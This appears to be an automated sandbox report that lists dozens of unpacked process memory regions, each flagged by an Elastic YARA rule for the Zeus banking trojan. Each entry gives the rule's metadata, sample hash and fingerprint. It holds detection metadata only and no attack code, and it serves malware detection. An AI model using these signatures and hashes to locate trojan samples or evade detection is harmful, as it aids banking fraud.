    Source: 2.2.svchost.exe.2a02000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 22.2.tGYLgZxMWmmBTD.exe.1222000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 34.2.tGYLgZxMWmmBTD.exe.2742000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.53.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 13.2.tGYLgZxMWmmBTD.exe.d72000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.49.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.19.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.23.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.52.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 29.2.tGYLgZxMWmmBTD.exe.a42000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.888400.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.42.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 39.2.tGYLgZxMWmmBTD.exe.28f0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 29.2.tGYLgZxMWmmBTD.exe.a42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.31.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 24.2.tGYLgZxMWmmBTD.exe.a30000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.32.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 39.2.tGYLgZxMWmmBTD.exe.cb2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.33.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.49.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 20.2.tGYLgZxMWmmBTD.exe.2560000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.arxtPs1STE.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.888400.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.17.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.2.svchost.exe.2bb0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.53.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 13.2.tGYLgZxMWmmBTD.exe.dd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.37.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.26.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.26.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.35.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.44.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.48.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.2.svchost.exe.407000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 5.2.tGYLgZxMWmmBTD.exe.872000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.33.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 26.2.tGYLgZxMWmmBTD.exe.12e2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.3.arxtPs1STE.exe.780618.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.28.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.44.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
